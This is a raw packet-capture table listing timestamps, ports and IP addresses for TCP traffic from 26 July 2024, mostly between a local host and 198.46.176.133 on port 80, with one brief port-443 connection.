Jul 26, 2024 13:02:47.216000080 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.216029882 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.216069937 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.216622114 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.216654062 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.216685057 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.216716051 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.216737986 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.216767073 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.216798067 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.216837883 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.216850996 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.216881037 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.216912031 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.216950893 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.216964006 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.216994047 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.217555046 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.217595100 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.217607975 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.217638016 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.217669010 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.217699051 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.217720985 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.217751026 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.217782021 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.217820883 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.217833996 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.217863083 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.217894077 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.217933893 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.217947006 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.218450069 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.218482018 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.218521118 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.218533993 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.218564034 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.218595982 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.218635082 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.218648911 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.218677998 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.218709946 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.218750954 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.218764067 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.218794107 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.218976021 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.219182968 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.219213963 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.219243050 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.219265938 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.219296932 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.219335079 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.219347954 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.219377995 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.219408989 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.219451904 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.219465017 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.220951080 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.221002102 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.221023083 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.221055984 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.221115112 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.221275091 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.221307039 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.221338987 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.221380949 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.221394062 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.221554041 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.221585989 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.221616983 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.221638918 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.221669912 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.221740007 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.221986055 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.222034931 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.222065926 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.222107887 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.222121954 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.222151041 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.222182035 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.222213030 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.222234011 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.222264051 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.222296000 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.222333908 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.222347975 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.222378969 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.223036051 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.223068953 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.223090887 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.223120928 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.223153114 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.223184109 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.223205090 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.223234892 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.223268032 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.223309040 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.223321915 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.223351002 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.223385096 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.223423958 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.223437071 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.223872900 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.223905087 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.223944902 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.223958015 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.223989010 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.224016905 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.224064112 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.224272966 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.224304914 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.224337101 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.224378109 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.224390984 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.224423885 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.224455118 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.224525928 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.224574089 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.224606037 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.224637985 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.224668980 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.224689960 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.224720001 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.224891901 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.224917889 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.224971056 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.225002050 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.225033998 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.225065947 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.225086927 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.225117922 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.225148916 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.225173950 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.225203037 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.225266933 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.225395918 CEST	49179	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:47.225533009 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.225564957 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.225596905 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.225627899 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.225646973 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.225677967 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.225708961 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.225728989 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.225759983 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.225883007 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.226010084 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.226041079 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.226073027 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.226121902 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.226195097 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.226222992 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.226336956 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.230292082 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.230341911 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.230374098 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.230426073 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.230880976 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.230912924 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.230946064 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.230977058 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.230998993 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.231045961 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.231081963 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.231101036 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.231132984 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.231167078 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.231199026 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.231220007 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.231249094 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.231290102 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.231302977 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.231625080 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.231652975 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.231671095 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.231719017 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.231760979 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.231774092 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.231862068 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.231893063 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.231910944 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.231940985 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.231981039 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.231992960 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.232023954 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.232095957 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.232242107 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.232274055 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.232306004 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.232350111 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.232462883 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.232530117 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.232578993 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.232610941 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.232633114 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.232665062 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.232793093 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.232845068 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.232877016 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.232908964 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.232948065 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.232960939 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.232994080 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.233028889 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.233100891 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.233522892 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.233577967 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.233629942 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.233660936 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.233763933 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.233814955 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.233846903 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.233877897 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.233916044 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.233930111 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.234093904 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.234126091 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.234146118 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.234177113 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.234273911 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.234540939 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.234571934 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.234605074 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.234625101 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.234671116 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.234709024 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.234724045 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.234754086 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.234786034 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.234805107 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.234968901 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.235001087 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.235022068 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.235054016 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.235420942 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.235474110 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.235531092 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.235563993 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.235611916 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.235650063 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.235662937 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.235692024 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.235724926 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.235743999 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.235857964 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.235888958 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.235908031 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.236001015 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.236044884 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.236711025 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.236762047 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.236793995 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.236814022 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.236891031 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.236922026 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.236953974 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.236964941 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.236994982 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.237040997 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.237273932 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.237307072 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.237339020 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.237370014 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.237390041 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.237485886 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.237515926 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.237536907 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.237612963 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.237643003 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.237663031 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.237692118 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.237737894 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.237896919 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.237946033 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.237977982 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.237998009 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.238190889 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.238223076 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.238240957 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.238271952 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.238308907 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.238357067 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.238548994 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.238579988 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.238611937 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.238630056 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.238817930 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.238864899 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.238948107 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.238996029 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.239027977 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.239047050 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.239078999 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.239121914 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.239170074 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.239200115 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.239232063 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.239253044 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.239281893 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.239315033 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.239360094 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.268506050 CEST	443	49179	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:47.274751902 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.276300907 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.276362896 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.276396990 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.276431084 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.276453018 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.276515007 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.276557922 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.276585102 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.276618958 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.276676893 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.316827059 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.316874981 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.316937923 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.316971064 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.317003012 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.317037106 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.317056894 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.317086935 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.317122936 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.317157984 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.317177057 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.317280054 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.317307949 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.317358017 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.317409992 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.317440987 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.317488909 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.317511082 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.317543983 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.317589045 CEST	49177	80	192.168.2.22	198.46.176.133
